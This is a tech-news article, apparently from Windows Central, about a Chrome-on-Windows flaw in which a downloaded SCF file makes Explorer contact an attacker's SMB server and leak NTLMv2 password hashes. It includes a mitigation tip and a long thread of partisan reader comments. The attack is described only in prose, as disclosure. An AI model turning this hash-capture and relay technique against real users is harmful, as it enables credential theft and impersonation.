Google working to fix Chrome flaw that could allow credential theft on Windows

A new flaw has been discovered in Google Chrome which could allow malicious actors to steal credentials on Windows PCs.

Discovered by DefenseCode security researcher Bosko Stankovic (via ZDNet), the flaw works through a clever trick in the way Chrome and Windows both treat Windows Explorer Shell Command File (SCF) files, which are used as a Show Desktop icon shortcut. The end result is that the SCF file can be used to obtain a users LAN Manager (NTLMv2) password hash.

Stankovic writes:

Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the "icon ".The remote SMB server set up by the attacker is ready to capture the victim's username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password.

Speaking with Kaspersky's ThreatPost, Google noted that it is "aware of this and taking the necessary actions."

If you rely on Google Chrome for browsing the web, you can protect yourself by heading to Settings > Show advanced settings and checking the box next to "Ask where to save each file before downloading" under the "Downloads" section. Given that this appears to work on all versions of Windows, even Windows 10, hopefully we see a resolution from Google soon.

Dan Thorp-Lancaster is the former Editor-in-Chief of Windows Central. He began working with Windows Central, Android Central, and iMore as a news writer in 2014 and is obsessed with tech of all sorts. You can follow Dan on Twitter @DthorpL and Instagram @heyitsdtl

45 Comments
  • ok...I think that Google must shut up!...and put an end to his campaign against Windows vulnerabilities!
  • Tbh, I don't see how this is hugely Google's fault.  I mean, that's like blaming Walmart for selling a kid chlorox wipes that he then squeezes in to a glass and drinks.  Microsoft AUTO RUNS a command line level script the second you view it in Explorer.  That's not the fault of the service that downloads it.
  • It doesn't run anything
  • Well, it kind of does.  It's told to automatically connect to something on the web, from something on the web.  I get why it's useful, but Microsoft should either block ones downloaded from a browser from loading all together, or just ask before attempting to load the shortcut.   It's running something built in to Windows, because some random file from the web told it to.  That is the flaw, not the way the file got there to begin with.
  • Once again UWPi s the way to go
  • Ahahahahahahahah No.
  • Remember when MS Antispyware flagged Google Chrome as spyware and removed it? Hahaha they were right then and still right today. It's probably not a vulnerability, but by design, sending all your passwords to your Google overlords...
  • And I guess by that logic WannaCry was actually secretly a MS plant to force people to upgrade their systems. Hey look, I can make stupid statements too.
  • Lol, very ironic considering Windows 10 is doing a whole lot worse than merely mining your passwords: http://youtube.com/watch?v=wPFbAqICUJo
  • That would make sense.  If the issue here was what Google does.  Please explain to me why we're focusing on Google downloading a file, instead of Windows automatically running a random file downloaded from the web.  That is the exploit.  There's a script I can put on anyone's computer, and they automatically run it.  If I were to download this file in Edge, and put it in my downloads folder, it would still run.
  • Make UWP app for google chrome, problem solved. Because it will be in UWP sandboxed enviornment.
  • There is one issue with that, I think in order for Google to get a Chrome UWP app published in the store they would need to use Edge to render websites.
  • Yep. It also wouldn't be possible to make it the default browser either.
  • Hey Google we give you 4 weeks for a patch. Otherwise we tell the world. Sound familiar Google. Lol.
  • The world already knows though, obviously.
  • In the comments on a recent story about a vulnerability found in Windows by Google, someone tried to tell me that Google were doing more to keep Windows safe than Microsoft were. If they are, it would appear that it is at the expense of their own software.
  • Well surprise surpise, lol. UWP, and html5 compliant and edge rendering ftw. 
  • Maybe Windows Defender should quarentine vulnerable software :)
  • Maybe windows 10 should ban google chrome :) It's dangerous software
  • Right.  Defender shouldn't allow the OS to run random files downloaded from the web without asking the user first.  That is what the vulnerability is, nothing in Chrome.
  • Uninstalled google Chrome long time back, when it started giving trouble viewing Youtube using W10 apps. My main browser is edge and sometimes I use Opera/Firefox.  So much for hungry Google about collecting every aspect of the user. Thankfully we don't have cameras from google.   
  • Very simple fix: DON'T USE CHROME!
  • 😂 Been using that fix from long long time 😂
  • Chrome isn't the real culprit.  Chrome puts chlorox wipes on the counter.  Microsoft opens them, pours the liquid from the wipes in a cup and drinks it without thinking.  Chrome thought Microsoft was an adult and knew not to do that.   The fault here is that Microsoft runs files without asking.  How is that expected behavior?  In theory, I should be able to download a virus laden file, and delete it and not be infected unless I run it.  Microsoft runs random files from the web, without asking.  That is the issue here.
  • My apologies, it isn't actually running a file, it is a shortcut connecting.  So it is more like causing Windows to run code it already has.  Either way, it shouldn't do that with icons/shortcuts/links from the web without asking first.
  • Just uninstall chrome and use proper browsers. Edge and Opera are quite great.
  • Chrome is for children
  • They, however, are not proper browsers. But of course, coming from you, one wouldn't expect a smart suggestion anyway.
  • None of my devices have google chrome installed. I can't even use google chrome.
    My only browser is Edge.
    When I visit google on my Lumia 950xl, google keep begging me to install chrome, I laugh at their poor advertisement, they don't know it is a Lumia, and they are yet to develop UWP for Lumia. So even if I wanted to, how can I stall it on my Lumia?
    I am very satisfied with the Edge browser.
  • It's not available and very unlikely to become available. There is a *slight* chance that Alphabet may make a UWP app for Windows 10 S, but that will come down to userbase (how attractive it is for Alphabet/Google). However, even if they do make a UWP Chrome there is no guarantee it would be made available on mobile. I think UCBrowser is your only Edge alternative at the current time?
  • Monument browser is the best.
  • That split screen stuff... Awesome.
  • Did the memory leak or CPU usage ever get fixed? That was when I stopped using chrome - when it stopped being the light-weight, standards-compliant, browser it set out to be.
  • WC W10M app is posting comment twice I guess 😆
  • See no one cares
  • Google products are traditionally hollow as colander.
  • **** Alphabet, and **** Google. They didn't give us a youtube and Gmaps app and killed our platform. Now we won't let them make a windows 10 s browser and ruin their platform.
  • "Malicious actors"? ...What, like Vinnie Jones?
  • But but but Chrome never has exploits, because open source, because not Edge, because because because.
  • i thought Edge's core is also open-source?
  • No one says Open Source doesn't have exploits.  They say Open Source is harder to have backdoors* since people can vet the code.  This is in no way Chrome's fault.  Microsoft should be easily able to spot icons downloaded from the web, and ask your permission before running them.  That's the real culprit.  If they know an icon initiated from the web, it shouldn't auto-run.
  • I know this is a Windows centered site, but this is way slanted.  Google Chrome simply downloads a file, which yes, should be off by default.  That should be fine really, since just having a bad file on your PC shouldn't hurt until you run it.  Windows automatically runs the file.  That is the problem.  It should say "Are you sure you want to run this script?"  That's the actually terrible part, autodownloading files is just not that great.
  • It doesn't run anything
  • Well, it kind of does.  It's told to automatically connect to something on the web, from something on the web.  I get why it's useful, but Microsoft should either block ones downloaded from a browser from loading all together, or just ask before attempting to load the shortcut.   It's running something built in to Windows, because some random file from the web told it to.  That is the flaw, not the way the file got there to begin with.
  • I hope they fix this soon.